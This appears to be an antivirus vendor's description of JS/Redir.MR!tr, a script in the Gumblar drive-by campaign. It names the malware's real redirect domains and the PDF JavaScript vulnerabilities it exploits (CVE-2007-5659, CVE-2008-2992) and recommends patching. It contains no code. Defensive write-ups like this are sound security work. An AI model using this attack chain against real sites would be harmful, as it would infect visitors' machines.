JS/Redir.MR!tr

Alias/esTroj/JSRedir-R (Sophos)
Release DateMay 15, 2009
Detection Availability
Active DatabaseExtended Database
FortiGatelowhigh
FortiClient
FortiMailN/A
Current Antivirus Definition Database Version: 12.196
Description

Visible Symptoms

  • Redirect to malicious websites.

    • Detailed Analysis


    JS/Redir.MR!tr is part of a drive-by download exploit that is also known as Gumblar, Zlkon, or GENO, consisting of several stages. In the first stage, an obfuscated script is injected to compromise websites via cross-site scripting.

  • The obfuscation technique varies from different infections, but mostly decodes to the same malicious URL. The following domains are known to be used as second stage malware domains as of this writing:
    • gumblar.cn
    • Martuz.cn
  • The second stage occurs when internet users visit infected websites. The injected script redirects the web browser to a malicious website that is hosting other malicious downloabable components such as PDF and SWF files. These files contain exploits which eventually download a malicious Win32 executable.

  • Some notable exploits included target the vulnerabilities in the Collab.collectEmailInfo() (CVE-2007-5659) and util.printf() (CVE-2008-2992) JavaScript methods by passing overly long arguments to the affected functions.

  • Earlier versions of Foxit Reader was also affected by the same vulnerability util.printf() (CVE-2008-1104).

  • It is advisable to update patches for the affected vulnerabilities.

  • Some reports indicate that this malware may also redirect Google search results.


    • Description Last Updated Date: Jun 11, 2009
    Reference: ID - 850946